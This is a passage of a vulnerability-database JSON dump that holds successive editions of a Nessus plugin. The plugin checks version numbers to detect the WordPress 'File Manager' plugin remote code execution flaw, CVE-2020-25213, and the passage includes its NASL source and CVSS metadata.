script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"No CVE available for this vulnerability.\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-14T19:32:17", "differentElements": ["cvelist", "cvss", "cvss3", "sourceData"], "edition": 2}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "621650a17a4b2e2d08f7dc6548dcf82a4331d5ce15bad9abf042d905e4f48aa7", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2020-09-19T11:02:54", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2020-09-19T11:02:54", "references": [{"idList": ["WPVDB-ID:10389"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:10389"], "type": "wpexploit"}, {"idList": ["CVE-2020-25213"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-09-19T11:02:54", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/18\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-19T11:02:54", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "8b0f7e3c24fd4fa330e59f458c868d247a03b54443456e2b1bad6dbebeaea05e", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2020-09-22T10:55:37", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"modified": "2020-09-22T10:55:37", "references": [{"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"], "type": "attackerkb"}, {"idList": ["WPEX-ID:10389"], "type": "wpexploit"}, {"idList": ["CVE-2020-25213"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-09-22T10:55:37", "rev": 2, "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-22T10:55:37", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "5ff3a548c25ed900d7082c8bf2fa576ba7a636bd74f78157453efa18c0c2292b", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2020-11-13T06:46:09", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"modified": "2020-11-13T06:46:09", "references": [{"idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:160003"], "type": "packetstorm"}, {"idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"], "type": "rapid7blog"}, {"idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"], "type": "attackerkb"}, {"idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"], "type": "wpexploit"}, {"idList": ["E-722"], "type": "dsquare"}, {"idList": ["CVE-2020-25213"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-11-13T06:46:09", "rev": 2, "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-11-13T06:46:09", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "1e38915f9e2fc2dbbc395efef93cb9e7", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-07-29T22:24:48", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-07-29T22:24:48", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-07-29T22:24:48", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T22:24:48", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "exploitableWith", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "537f23e3d18f9c734e3984fe974f4f1f", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-08-05T12:59:31", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-08-05T12:59:31", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-05T12:59:31", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, 